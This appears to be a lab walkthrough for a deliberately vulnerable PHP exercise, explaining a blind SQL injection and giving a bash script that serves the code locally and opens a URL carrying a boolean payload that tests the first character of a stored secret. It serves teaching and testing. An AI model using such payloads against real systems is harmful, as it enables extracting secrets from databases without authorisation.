Blind-SQL-Injection

https://gitlab.com/jobertabma/vulnerable-code/-/tree/master/blind-sql-injection?ref_type=heads

Step 1: Understand the Vulnerability

The code snippet is vulnerable to SQL injection because it directly includes user input ($_GET['id']) in the SQL query without sanitization. This allows an attacker to manipulate the query.

Step 2: Create and Run the Bash Script

1. Create the Bash Script: Create a file named run.sh and add the provided Bash script to it.

cat > run.sh << 'EOF'
#!/bin/bash

echo $1 > _tmp/strip

php -S 127.0.0.1:8080 -t blind-sql-injection &

open 'http://127.0.0.1:8080/?id=-1%20OR%20SUBSTR((SELECT%20secret%20FROM%20secrets%20LIMIT%201),%201,%201)%20=%20%27T%27'

wait
EOF

Explanation of the Script:

• echo $1 > _tmp/strip: This line writes the first argument passed to the script into the _tmp/strip file. This may be part of your application's logic.

• php -S 127.0.0.1:8080 -t blind-sql-injection &: This starts a PHP built-in web server serving files from the blind-sql-injection directory. The & at the end runs the server in the background.

• open 'http://127.0.0.1:8080/?id=-1%20OR%20SUBSTR((SELECT%20secret%20FROM%20secrets%20LIMIT%201),%201,%201)%20=%20%27T%27': This opens a web browser and navigates to the URL with the SQL injection payload to test the vulnerability.

• wait: This waits for all background processes to complete before the script finishes.

2.Make the Script Executable: Change the script's permissions to make it executable.

chmod +x run.sh

3.Run the Script: Execute the script with a parameter if necessary (test).

./run.sh test

Expected Outcomes:

In the Web Browser:

• Successful Exploitation:

  • If the first character of the secret in the database is 'T', the page should display "Yes!".

  • If the first character of the secret is not 'T', the page should display "No!".

In the Terminal:

• The script should run without errors, and the PHP built-in server should be running, allowing you to test further SQL injection payloads manually.